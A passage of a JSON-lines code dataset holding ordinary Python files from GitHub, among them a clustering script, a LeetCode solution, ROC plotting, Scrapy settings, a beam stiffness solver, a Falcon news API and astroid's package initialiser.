Repoch[0]\n matx_sil[i, :] = Repoch[1]\n matx_ch[i, :] = Repoch[2]\n # matx_gs[i, :] = Repoch[3]\n\n mean_elbows = matx_elbows.sum(axis=0) / epochs\n mean_sil = matx_sil.sum(axis=0) / epochs\n mean_ch = matx_ch.sum(axis=0) / epochs\n # matx_gs = matx_gs.sum(axis=0) / epochs\n st = StandardScaler()\n # mean_ch = st.fit_transform(mean_ch)\n # print(mean_ch)\n # mean_ch = mean_ch / max(mean_ch.tolist()[0])\n\n print('SSE',mean_elbows.tolist()[0])\n print('轮廓系数',mean_sil.tolist()[0])\n print('Norm CH值',mean_ch.tolist()[0])\n # print('Gap Statistic',matx_gs.tolist()[0])\n # plt.figure(figsize=(15,8))\n fig = plt.figure(figsize=(15, 8))\n ax1 = fig.add_subplot(1, 1, 1)\n ax2 = ax1.twinx()\n # X = [10,20,30,40,50,60,70,80,90,100,110,120,130,140,150]\n X = range(10,562,10)\n ax1.plot(X, mean_elbows.tolist()[0], marker='o', label='Elbow')\n ax2.plot(X, mean_sil.tolist()[0], 'r', marker='*', label='Silhouette Coefficient')\n # ax2.plot(X, mean_ch.tolist()[0], 'g', marker='*', label='CH norm')\n # ax2.bar(X, matx_gs.tolist()[0], label='Gap Statistic')\n ax1.set_ylabel('SSE', fontsize=20)\n ax1.set_xlabel('K', fontsize=20)\n ax2.set_ylabel('Value', fontsize=20)\n ax1.tick_params(labelsize=20)\n ax2.tick_params(labelsize=20)\n ax1.legend(loc='lower left', fontsize=20)\n ax2.legend(loc='upper right',fontsize=20)\n # plt.show()\n plt.savefig('centroids_4.png')\n \nif __name__ == '__main__':\n vg_dataset = fineTuningDataset('datasets/image_caption_triplet_all.json',\"/home/qifan/datasets/coco/train2014/\",'train')\n # train_dataset = fineTuningDataset('gqa_triplets.json',\"/home/qifan/datasets/GQA/images/\",'train')\n data_loader = DataLoader(vg_dataset, batch_size=8, shuffle=True)\n predicate_words = vg_dataset.predicates_words\n predicate_dict = dict()\n for p in predicate_words:\n predicate_dict[p] = [[p]]\n for triplet_info in vg_dataset.triplets:\n triplet = triplet_info['triplet']\n predicate_dict[triplet[1].lower()].append(triplet)\n prep_words = []\n ignore_words = []\n kmeans = WordsCluster('/home/qifan/FG-SGG_from_LM/bert-base-uncased', ignore_keywords=ignore_words, prep_words=prep_words)\n # kmeans.monte_carlo(predicate_dict)\n # using sim_threshold to initilize the number of clusters for total classes\n # cluster_dict = kmeans.cluster(predicate_dict, num_clusters=230, sim_threshold=0.7)\n # json.dump(cluster_dict, open('utils_data/cluster/CaCao_all_cluster_dict_07.json', 'w'))\n # using sim_threshold to initilize the number of clusters for target classes\n cluster_dict = kmeans.cluster(predicate_dict, num_clusters=39, sim_threshold=0.7)\n json.dump(cluster_dict, open('utils_data/cluster/CaCao_map50_dict_07.json', 'w'))\n\n","repo_name":"Yuqifan1117/CaCao","sub_path":"adaptive_cluster.py","file_name":"adaptive_cluster.py","file_ext":"py","file_size_in_byte":16745,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"8"}
+{"seq_id":"73360824260","text":"#\n# @lc app=leetcode.cn id=415 lang=python3\n#\n# [415] add-strings\n#\nclass Solution:\n def addStrings(self, num1: str, num2: str) -> str:\n idx1=len(num1)-1\n idx2=len(num2)-1\n res=[]\n borrow=0\n while idx1>=0 and idx2>=0:\n tmp=int(num1[idx1])+int(num2[idx2])+borrow\n borrow=0\n idx1-=1\n idx2-=1\n if tmp>9:\n tmp-=10\n borrow=1\n res.append(str(tmp))\n while idx1>=0:\n tmp=int(num1[idx1])+borrow\n borrow=0\n idx1-=1\n if tmp>9:\n tmp-=10\n borrow=1\n res.append(str(tmp))\n while idx2>=0:\n tmp=int(num2[idx2])+borrow\n borrow=0\n idx2-=1\n if tmp>9:\n tmp-=10\n borrow=1\n res.append(str(tmp))\n if borrow==1:\n res.append(str(borrow))\n return ''.join(res[::-1])\n# @lc code=end","repo_name":"zhanjw/leetcode","sub_path":"codes_auto/415.add-strings.py","file_name":"415.add-strings.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"19272429052","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 17 21:56:20 2018\n\n@author: hjh\n\"\"\"\nimport matplotlib.pyplot as plt \nimport os\n\ndef proba_sort(path, isMAG):\n xy_arr = []\n \n f1 = open(os.path.join(path, 'testPair1.txt'))\n f2 = open(os.path.join(path, 'testPair2.txt'))\n f3 = open(os.path.join(path, 'differentPair.txt'))\n \n sp = ':'\n if isMAG:\n sp = '\\t'\n \n for each in f1.readlines():\n xy_arr.append([float(each.strip().split(sp)[1]), 1])\n for each in f2.readlines():\n xy_arr.append([float(each.strip().split(sp)[1]), 1])\n for each in f3.readlines():\n xy_arr.append([float(each.strip().split(sp)[1]), 0])\n \n f1.close()\n f2.close()\n f3.close()\n \n xy_arr = sorted(xy_arr, key=lambda x : x[0], reverse=True)\n return xy_arr\n\n\ndef plot_roc(score_mag, score_twadn):\n xy_cor = [[0, 0]]\n pre_x = 0.0\n pre_y = 0.0\n for sc, label in score_mag:\n if label == 1:\n pre_y = pre_y + (1 / 90)\n else:\n pre_x = pre_x + (1 / 100)\n xy_cor.append([pre_x, pre_y])\n \n xy_arr_tw = [[0, 0]]\n pre_xt = 0.0\n pre_yt = 0.0\n for sc, label in score_twadn:\n if label == 1:\n pre_yt = pre_yt + (1 / 90)\n else:\n pre_xt = pre_xt + (1 / 100)\n xy_arr_tw.append([pre_xt, pre_yt])\n \n x_mag = [x[0] for x in xy_cor]\n y_mag = [y[1] for y in xy_cor]\n \n x_twa = [x[0] for x in xy_arr_tw]\n y_twa = [y[1] for y in xy_arr_tw]\n #print(xy_cor)\n print('AUROC DynaMAGNA++', under_curve(x_mag, y_mag))\n print('AUROC twadn', under_curve(x_twa, y_twa))\n plt.plot(x_mag, y_mag, color='r', label='DynaMAGNA++')\n plt.plot(x_twa, y_twa, color='g', label='twadn')\n # plt.title(\"ROC\")\n plt.xlabel(\"False Positive Rate\", fontsize='x-large')\n plt.ylabel(\"True Positive Rate\", fontsize='x-large')\n plt.legend(loc=8, fontsize='large')\n plt.show()\n \n \ndef plot_pr(score_mag, score_twadn):\n p_mag = []\n r_mag = []\n p_twadn = []\n r_twadn = []\n for i in range(190):\n tp_mag = 0.0\n fp_mag = 0.0\n tp_twa = 0.0\n fp_twa = 0.0\n for j in range(i+1):\n if score_mag[j][1] == 1:\n tp_mag += 1\n else:\n fp_mag += 1\n if score_twa[j][1] == 1:\n tp_twa += 1\n else:\n fp_twa += 1\n p_mag.append(tp_mag / (tp_mag + fp_mag))\n r_mag.append(tp_mag / 90.0)\n p_twadn.append(tp_twa / (tp_twa + fp_twa))\n r_twadn.append(tp_twa / 90.0)\n \n print('AUPR DynaMAGNA++', under_curve(r_mag, p_mag))\n print('AUPR twadn', under_curve(r_twadn, p_twadn))\n print('f1 DynaMAGNA++', get_F1(r_mag, p_mag))\n print('f1 twadn', get_F1(r_twadn, p_twadn))\n # f1_max_mag, f1_cross_mag = get_F1(r_mag, p_mag)\n # f1_max_twa, f1_cross_twa = get_F1(r_twadn, p_twadn)\n \n \n plt.plot(r_mag, p_mag, color='r', label='DynaMAGNA++')\n plt.plot(r_twadn, p_twadn, color='g', label='twadn')\n plt.xlabel(\"Recall\", fontsize='x-large')\n plt.ylabel(\"Precision\", fontsize='x-large')\n plt.legend(loc=8, fontsize='large')\n plt.show()\n \n\ndef under_curve(x, y):\n m = len(x)\n sqr = 0.0\n for i in range(1, m):\n sqr += 0.5 * (x[i] - x[i-1]) * (y[i] + y[i-1])\n return sqr\n \n\ndef get_F1(r, p):\n f1_max = 0.0\n f1_cross = 0.0\n dist = 1.0\n m = len(r)\n for i in range(m):\n f1 = 2 * r[i] * p[i] / (r[i] + p[i])\n if f1 > f1_max:\n f1_max = f1\n if abs(p[i] - r[i]) < dist:\n f1_cross = f1\n dist = abs(p[i] - r[i])\n # print(i, f1)\n return f1_max, f1_cross\n \n \nif __name__ == '__main__':\n pathMAGNA = '/home/hjh/桌面/workshop/my_study/lastNetCoffee2/DynaMAGNA++/CLI/testPair'\n pathTWADN = '/home/hjh/桌面/workshop/my_study/lastNetCoffee2/twadn/testdata/test'\n score_mag = proba_sort(pathMAGNA, True)\n score_twa = proba_sort(pathTWADN, False)\n #print(len(score_mag))\n plot_roc(score_mag, score_twa)\n plot_pr(score_mag, score_twa)","repo_name":"jhu99/twadn","sub_path":"testdata/py/py/roc_pr_plot.py","file_name":"roc_pr_plot.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"}
+{"seq_id":"14316093383","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for qcwy project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. You can find more settings consulting the documentation:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'qcwy'\n\nSPIDER_MODULES = ['qcwy.spiders']\nNEWSPIDER_MODULE = 'qcwy.spiders'\n\n#DUPEFILTER_DEBUG = 'True'\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'qcwy (+http://www.yourdomain.com)'\n\n# Configure maximum concurrent requests performed by Scrapy (default: 16)\n#CONCURRENT_REQUESTS=32\n\n# Configure a delay for requests for the same website (default: 0)\n# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay\n# See also autothrottle settings and docs\n#DOWNLOAD_DELAY=3\n# The download delay setting will honor only one of:\n#CONCURRENT_REQUESTS_PER_DOMAIN=16\n#CONCURRENT_REQUESTS_PER_IP=16\n\n# Disable cookies (enabled by default)\n#COOKIES_ENABLED=False\n\n# Disable Telnet Console (enabled by default)\n#TELNETCONSOLE_ENABLED=False\n\n# Override the default request headers:\n#DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n#}\n\n# Enable or disable spider middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n#SPIDER_MIDDLEWARES = {\n# 'qcwy.middlewares.MyCustomSpiderMiddleware': 543,\n#}\n\n# Enable or disable downloader middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n#DOWNLOADER_MIDDLEWARES = {\n# 'qcwy.middlewares.MyCustomDownloaderMiddleware': 543,\n#}\n\n# Enable or disable extensions\n# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html\n#EXTENSIONS = {\n# 'scrapy.telnet.TelnetConsole': None,\n#}\n\n# Configure item pipelines\n# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html\nITEM_PIPELINES = {\n 'qcwy.pipelines.QcwyJsonPipeline': 300,\n\t'qcwy.pipelines.QcwyMySQLPipeline': 800,\n}\n\n# Enable and configure the AutoThrottle extension (disabled by default)\n# See http://doc.scrapy.org/en/latest/topics/autothrottle.html\n# NOTE: AutoThrottle will honour the standard settings for concurrency and delay\n#AUTOTHROTTLE_ENABLED=True\n# The initial download delay\n#AUTOTHROTTLE_START_DELAY=5\n# The maximum download delay to be set in case of high latencies\n#AUTOTHROTTLE_MAX_DELAY=60\n# Enable showing throttling stats for every response received:\n#AUTOTHROTTLE_DEBUG=False\n\n# Enable and configure HTTP caching (disabled by default)\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings\n#HTTPCACHE_ENABLED=True\n#HTTPCACHE_EXPIRATION_SECS=0\n#HTTPCACHE_DIR='httpcache'\n#HTTPCACHE_IGNORE_HTTP_CODES=[]\n#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'\n\n#搜索参数\n#同一属性两个条件联合用逗号分隔\nKEYWORD = {\n 'jobarea': '020000,030200,010000,040000,080200,00', #北上广深杭\n 'industrytype': '00', #32表示互联网,42银行,03证券/金融,43保险, 00全体\n 'keyword': '数据分析',\n 'workyear': '99', #99表示所有,01无经验,02一到三年,03三到五年,04五到十年\n }\n\n\n#所需要的搜索的技能表,key为技能名,value为对应正则表达式\nSKILLS = {\n 'has_excel': 'excel',\n 'has_mining': u'数据挖掘',\n 'has_python': 'python',\n 'has_hadoop': 'Hadoop',\n 'has_hive': 'HIVE',\n 'has_sql': 'SQL',\n 'has_sas': 'SAS',\n 'has_spss': 'SPSS',\n 'has_java': 'java',\n 'has_GA': 'Google Analytics|GA',\n 'has_crawler': u'爬虫',\n 'has_ETL': u'数据仓库|ETL',\n 'has_R': r'\\bR(语言)?\\b',\n 'has_mlearning': u'机械学习|scikit',\n 'has_modeling': u'建模|数学模型',\n 'has_algorithm': u'算法',\n 'has_visialize': u'可视化|tableau'\n }\n \n#输入你的登录名与密码 \nFORMDATA = {'username': 'name', 'userpwd': 'password'}\n\n#数据库名称与表名\nDATABASE = {\n 'user': 'root', \n 'password': 'password', \n 'host': 'localhost',\n 'name': 'job_project',\n 'table': 'alljobs'\n }","repo_name":"yiqiyu/webspider","sub_path":"qcwy/qcwy/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"23629911630","text":"import sys\nfrom md import *\nsys.stdin = open('input.txt')\n###############################################\nT = int(input())\nfor tc in range(1, T + 1):\n word = list(input())\n # 스택이 아닌 풀이과정\n # while True:\n # delete = []\n # for i in range(len_(word)-1):\n # if word[i] == word[i + 1]:\n # delete.append(i)\n # break\n # if len_(delete) == 0:\n # break\n #\n # for i in delete:\n # word.remove(word[i])\n # word.remove(word[i])\n #\n # print(f'#{tc}', len_(word))\n\n # 스택 빈 리스트 만들기\n stack = []\n for i in word:\n # 스택에 하나씩 넣는다\n stack += i\n # 스택의 길이가 2이상이고 맨 뒤 두개가 같다면\n if len_(stack) > 1 and stack[-1] == stack[-2]:\n # 맨 뒤 두개를 삭제한다.\n stack.pop()\n stack.pop()\n\n print(f'#{tc}', len_(stack))","repo_name":"chahyeoncheol/Algorithm","sub_path":"230809/4873. 반복문자 지우기.py","file_name":"4873. 반복문자 지우기.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"18927901922","text":"#Beam Solver using stiffness matrix method\r\n#Unyielding support condition\r\n#Unit=kN,m\r\n#Where, K=Pj-Pl(PL=member reaction due to given load, Pj=given joint load)\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport pandas as pd\r\nfrom PyQt5 import QtWidgets\r\n \r\n#%% Data Input\r\n\r\n\r\npath=os.getcwd()\r\ndata=pd.read_csv(path+'\\\\input.csv')\r\nNODES=data.Nodes.dropna()\r\nX=data.x.dropna()\r\nY=data.y.dropna()\r\nP_joint=data.P_joint.dropna()\r\nM_joint=data.M_joint.dropna()\r\nL_all=data.L.dropna()\r\nEI_all=data.EI.dropna()\r\n\r\n#formatting data input\r\nN_i=data.node_i.dropna()\r\nN_j=data.node_j.dropna()\r\ndy=data.defln_y.dropna()\r\nrot=data.rot.dropna()\r\nM_i=data.FEM_frd.dropna()\r\nM_j=data.FEM_back.dropna()\r\nR_i=data.R_i.dropna()\r\nR_j=data.R_j.dropna()\r\n\r\n\r\n#%%Formulation of global stiffness matrix\r\nl=len(NODES)\r\nelem=len(N_i)\r\ndof_total=4*l\r\nK_elem=np.zeros([4,4])\r\nn=elem*2+2\r\nK_global=np.zeros([n,n])\r\nK_all=[]\r\nfor i in range(0,elem):\r\n K=[]\r\n EI=EI_all[i]\r\n L=L_all[i]\r\n K.append(12*EI/L**3)\r\n K.append(6*EI/L**2)\r\n K.append(-12*EI/L**3)\r\n K.append(6*EI/L**2)\r\n K.append(6*EI/L**2)\r\n K.append(4*EI/L)\r\n K.append(-6*EI/L**2)\r\n K.append(2*EI/L)\r\n K.append(-12*EI/L**3)\r\n K.append(-6*EI/L**2)\r\n K.append(12*EI/L**3)\r\n K.append(-6*EI/L**2)\r\n K.append(6*EI/L**2)\r\n K.append(2*EI/L)\r\n K.append(-6*EI/L**2)\r\n K.append(4*EI/L)\r\n\r\n #making element stiffness matrix of size equal to dummy global matrix by padding\r\n K=np.array(K)\r\n K=K.reshape(4,4)\r\n #Printing inividual stiffness matrix\r\n print(\"\\n<<<<>>>>\\n\")\r\n print(K)\r\n K=np.pad(K,(i*2,(n-4)-i*2))\r\n #storing matrix value in dynamic variable: K1, K2, K3......\r\n globals()[f\"K{i+1}\"] = K\r\n #Creating Global Matrix\r\n K_global=K_global+K\r\n\r\n#%%Connectivity check of members\r\n#Computing total FEM and member reactions at each ends\r\nP=[]\r\nfor i in NODES:\r\n FEM_total=0\r\n R_total=0\r\n a_i=N_i.index[N_i==i].tolist()\r\n a_j=N_j.index[N_j==i].tolist()\r\n for j in a_i:\r\n FEM_total=FEM_total+M_i[j]\r\n R_total=R_total+R_i[j]\r\n for k in a_j:\r\n FEM_total=FEM_total+M_j[k]\r\n R_total=R_total+R_j[k]\r\n P.append(R_total)\r\n P.append(-1*FEM_total)\r\n \r\n #Individual nodal loads eg. FEM_A, FEM_B,....\r\n globals()[f\"FEM_{i}\"]=FEM_total\r\n globals()[f\"R_{i}\"]=R_total\r\nP=np.array(P)\r\n\r\n#%%Formatting given joint load matrix\r\nP_JOINT=[] #(Given joint load)\r\nfor i in range(0,len(NODES)):\r\n P_JOINT.append(float(P_joint[i]))\r\n P_JOINT.append(float(-1*M_joint[i]))\r\n\r\nP_JOINT=np.array(P_JOINT)\r\n#Combined load of given joint load and member reaction (PL_Pj)\r\nP=P_JOINT-P #P=matrix due to given loading condition\r\n #P_JOINT= given joint load\r\n \r\n#%%Droping rows and columns having 0 deflection and rotation\r\n#Merging and ordering\r\ndelta=[]\r\nfor i in range(0,len(NODES)):\r\n delta.append(float(dy[i]))\r\n delta.append((rot[i]))\r\ndelta=pd.Series(delta)\r\n#identifying row index having no deflection and rotation\r\nfor i in range(0,n):\r\n drop_me=delta.index[delta!=\"x\"].tolist()\r\n\r\n#Dropping cells\r\nk_global=np.delete(K_global,drop_me,axis=0)\r\nk_global=np.delete(k_global,drop_me,axis=1)\r\nrxn=np.delete(P,drop_me)\r\n\r\n#%%Calculating Unknown deflections and rotations\r\ninv_k=np.linalg.inv(k_global) #inverse of global stiffness matrix\r\ndefln=np.matmul(inv_k,rxn)\r\n\r\n#Overwriting unknown deflection 'x' with computed values\r\nfor i in range(0,n):\r\n ind_unknown=delta.index[delta==\"x\"].tolist()\r\nfor i in range(0,len(ind_unknown)):\r\n delta[ind_unknown[i]]=defln[i]\r\ndelta=np.array(delta)\r\ndelta=delta.astype(float)\r\n\r\n#Final reaction calculation\r\nR=np.matmul(K_global,delta)-P\r\nR=np.round(R,3)\r\n\r\nResult=pd.DataFrame({\"Deflection\":delta,\r\n \"Reaction\":R})\r\nprint(\"\\n<<<<<>>>>>\\n\")\r\nprint(K_global)\r\n\r\nprint(\"\\n<<<<<>>>>>\\n\")\r\nprint(Result)\r\n","repo_name":"santoshkatuwal/Direct-stiffness-method-Beam-","sub_path":"Beam Calculator.py","file_name":"Beam Calculator.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"33215629952","text":"import pandas as pd\nfrom pandas import np, DataFrame\nfrom seaborn import load_dataset\nfrom sklearn.datasets import load_iris\nfrom sklearn.impute import SimpleImputer\n\n\nclass MLWarmup:\n def getIrisDataset(self):\n iris = load_iris()\n index = 0\n while(index < len(iris['target'])):\n print(iris['data'][index], iris['target'][index], iris['target_names'][iris['target'][index]],\n sep=' | ')\n index += 1\n def getPlanetsDataset(self):\n planets_df = load_dataset(\"planets\")\n print(planets_df)\n column_names = ['method', 'number', 'orbital_period', 'mass', 'distance', 'year']\n # ilość wartości pustych w kolumnach\n print(planets_df.isnull().sum())\n # usuń wszystkie kolumny zawierające więcej niż połowę wartości pustych - 1035\n half_dataset_no = int(len(planets_df)/2)\n planets_df1 = planets_df\n for c in column_names:\n if(planets_df[c].isnull().sum() > half_dataset_no):\n planets_df1 = planets_df1.drop(c,axis=1)\n print(planets_df1.isnull().sum())\n # usuń wszystkie te wiesze kóre zawierają ponad połowę wartości pustych -> planets_df\n planets_df2 = planets_df\n planets_df2 = planets_df2.dropna(thresh=4)\n print(planets_df2)\n # uzupełnianie pustych danych\n imp = SimpleImputer(missing_values=np.nan, strategy='most_frequent')\n planets_df3 = imp.fit_transform(planets_df)\n planets_df3 = DataFrame(planets_df3, columns=list(planets_df.columns))\n print(planets_df3.isnull().sum())\n print(planets_df3)\n\nml = MLWarmup()\n# ml.getIrisDataset()\nml.getPlanetsDataset()","repo_name":"mgorzalczany/Machine_Learning_Project","sub_path":"venv/ML_script.py","file_name":"ML_script.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"28440045888","text":"from stmt_run import STMT\nimport torch\nimport random\nimport numpy as np\nimport argparse\nimport time\nimport pdb\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--mode\",\n help=\"train_single, finetune_with_multi, test_multi_ensemble, test_multi, test_single\")\n\nparser.add_argument(\"--seed\", default=65, help=\"Please choose a seed, you can either use 123, 65, 413\")\n# For training\nparser.add_argument(\"--img_dir\", default=\"../Blood_data/train\")\nparser.add_argument(\"--csv_path\", default=\"../Blood_data/train.csv\")\nparser.add_argument(\"--checkpoint_path\", default=\"../model\", help=\"Please give a model saving path.\")\nparser.add_argument(\"--model_name\", default=\"test\", help=\"Please give a model name for saving, i.e.'Resnet18_single'\") \n\nparser.add_argument(\"--model_dir\", default=\"../model/ann_res_seed65_9.pth\")\nparser.add_argument(\"--validation_split\", default=False, help=\"True for training whole data, False for split validation set\")\nparser.add_argument(\"--validation_only\", default=False, help=\"True for only see validation score of whole training data, without training\")\nparser.add_argument(\"--model_which\", default=\"resnet34\")\n\n# For ensemble with multi inference\nparser.add_argument(\"--model1\", default=\"../model1.pth?dl=1\")\nparser.add_argument(\"--model2\", default=\"../model2.pth?dl=1\")\nparser.add_argument(\"--model3\", default=\"../model3.pth?dl=1\")\nparser.add_argument(\"--output_csv_name\", default=\"test.csv\")\n\nparser.add_argument(\"--test_dir\", default=\"../Blood_data/test\")\nargs = parser.parse_args()\n\n\n# fix random seeds for reproducibility\nSEED = int(args.seed)\ntorch.manual_seed(SEED)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nrandom.seed(SEED)\nnp.random.seed(SEED)\n\nstmt_obj = STMT(args)\nif args.mode=='train_single':\n if args.validation_only:\n print(\"Single Validating ...\")\n else:\n print(\"Single Training ...\")\n stmt_obj.train_single(validation_split=args.validation_split, validation_only=args.validation_only)\n\nelif args.mode=='finetune_with_multi':\n if args.validation_only:\n print(\"Validating on multi images after finetuning...\")\n else:\n print(\"Finetuning with multi images ...\")\n stmt_obj.batch_size = 12 # the dataset of multi images return 5 images\n stmt_obj.lr = 1e-6\n stmt_obj.finetune_with_multi(validation_split=args.validation_split, validation_only=args.validation_only)\n\nelif args.mode=='test_multi_ensemble':\n print(f'Start multi-image-ensemble, testing on {args.test_dir}')\n st = time.time()\n stmt_obj.test_ensemble()\n ed = time.time()\n print(f\"Total run time = {ed-st} seconds.\")\n\nelif args.mode=='test_multi':\n print(f'Start multi-image test, testing on {args.test_dir}')\n st = time.time()\n stmt_obj.test(image_mode=\"multi\")\n ed = time.time()\n print(f\"Total run time = {ed-st} seconds.\")\n\nelif args.mode=='test_single':\n print(f'Start single-image test, testing on {args.test_dir}')\n st = time.time()\n stmt_obj.test(image_mode=\"single\")\n ed = time.time()\n print(f\"Total run time = {ed-st} seconds.\")\n\n","repo_name":"PengWenChen/DLCV-Fall-2020","sub_path":"Final-PengWenChen/Single_Train_Multi_Test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"38815176832","text":"from model.publisher import Publishers\nfrom model.models import Articles\nfrom model.params import ArticlesParams\nfrom model.params import NewsParams\nfrom model.params import SearchParams\nimport falcon\n\n\nclass PublishersResource:\n def __init__(self):\n self.publishers = Publishers()\n\n def on_get(self, req, resp):\n resp.body = self.publishers.load_publishers()\n\n\nclass NewsResource:\n def __init__(self):\n self.articles = Articles()\n\n def on_get(self, req, resp, publisher_code=None):\n try:\n resp.body = self.articles.load_modified_news(NewsParams.from_req(req, publisher_code))\n except ValueError as e:\n raise falcon.HTTPBadRequest('bad request', 'invalid query: ' + str(e))\n\n\nclass SearchResource:\n def __init__(self):\n self.articles = Articles()\n\n def on_get(self, req, resp):\n try:\n resp.body = self.articles.load_modified_news(SearchParams.from_req(req))\n except ValueError as e:\n raise falcon.HTTPBadRequest('bad request', 'invalid query: ' + str(e))\n\n\nclass ArticleResource:\n def __init__(self):\n self.articles = Articles()\n\n def on_get(self, req, resp, news_id):\n try:\n resp.body = self.articles.load_article_history(news_id, ArticlesParams.from_req(req))\n except ValueError as e:\n raise falcon.HTTPBadRequest('bad request', 'invalid query: ' + str(e))\n\n\napp = falcon.API()\npublishers = PublishersResource()\napp.add_route('/api/publishers', publishers)\nnews = NewsResource()\napp.add_route('/api/news', news)\napp.add_route('/api/publisher/{publisher_code}/news', news)\nsearch = SearchResource()\napp.add_route('/api/search/news', search)\narticle = ArticleResource()\napp.add_route('/api/news/{news_id}', article)\n","repo_name":"code4hk/NewsdiffHK-Backend","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"8"}
+{"seq_id":"35531744000","text":"import enum\nimport itertools\nimport os\nfrom importlib import import_module\nfrom pathlib import Path\n\nimport wrapt\n\nfrom .__pkginfo__ import __version__, version\n\n_Context = enum.Enum(\"Context\", \"Load Store Del\")\nLoad = _Context.Load\nStore = _Context.Store\nDel = _Context.Del\ndel _Context\n\n\n# WARNING: internal imports order matters !\n# pylint: disable=wrong-import-order,wrong-import-position,redefined-builtin\n\n# make all exception classes accessible from astroid package\nfrom astroid.exceptions import *\n\n# make all node classes accessible from astroid package\nfrom astroid.nodes import *\n\n# trigger extra monkey-patching\nfrom astroid import inference\n\n# more stuff available\nfrom astroid import raw_building\nfrom astroid.bases import BaseInstance, Instance, BoundMethod, UnboundMethod\nfrom astroid.node_classes import are_exclusive, unpack_infer\nfrom astroid.scoped_nodes import builtin_lookup\nfrom astroid.builder import parse, extract_node\nfrom astroid.util import Uninferable\n\n# make a manager instance (borg) accessible from astroid package\nfrom astroid.manager import AstroidManager\n\nMANAGER = AstroidManager()\ndel AstroidManager\n\n# transform utilities (filters and decorator)\n\n\n# pylint: disable=dangerous-default-value\n@wrapt.decorator\ndef _inference_tip_cached(func, instance, args, kwargs, _cache={}):\n \"\"\"Cache decorator used for inference tips\"\"\"\n node = args[0]\n try:\n return iter(_cache[func, node])\n except KeyError:\n result = func(*args, **kwargs)\n # Need to keep an iterator around\n original, copy = itertools.tee(result)\n _cache[func, node] = list(copy)\n return original\n\n\n# pylint: enable=dangerous-default-value\n\n\ndef inference_tip(infer_function, raise_on_overwrite=False):\n \"\"\"Given an instance specific inference function, return a function to be\n given to MANAGER.register_transform to set this inference function.\n\n :param bool raise_on_overwrite: Raise an `InferenceOverwriteError`\n if the inference tip will overwrite another. Used for debugging\n\n Typical usage\n\n .. sourcecode:: python\n\n MANAGER.register_transform(Call, inference_tip(infer_named_tuple),\n predicate)\n\n .. Note::\n\n Using an inference tip will override\n any previously set inference tip for the given\n node. Use a predicate in the transform to prevent\n excess overwrites.\n \"\"\"\n\n def transform(node, infer_function=infer_function):\n if (\n raise_on_overwrite\n and node._explicit_inference is not None\n and node._explicit_inference is not infer_function\n ):\n raise InferenceOverwriteError(\n \"Inference already set to {existing_inference}. \"\n \"Trying to overwrite with {new_inference} for {node}\".format(\n existing_inference=infer_function,\n new_inference=node._explicit_inference,\n node=node,\n )\n )\n # pylint: disable=no-value-for-parameter\n node._explicit_inference = _inference_tip_cached(infer_function)\n return node\n\n return transform\n\n\ndef register_module_extender(manager, module_name, get_extension_mod):\n def transform(node):\n extension_module = get_extension_mod()\n for name, objs in extension_module.locals.items():\n node.locals[name] = objs\n for obj in objs:\n if obj.parent is extension_module:\n obj.parent = node\n\n manager.register_transform(Module, transform, lambda n: n.name == module_name)\n\n\n# load brain plugins\nBRAIN_MODULES_DIR = Path(__file__).with_name(\"brain\")\nfor module in os.listdir(BRAIN_MODULES_DIR):\n if module.endswith(\".py\"):\n import_module(f\"astroid.brain.{module[:-3]}\")\n","repo_name":"ruchee/vimrc","sub_path":"vimfiles/bundle/vim-python/submodules/astroid/astroid/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":415,"dataset":"github-code","pt":"8"}
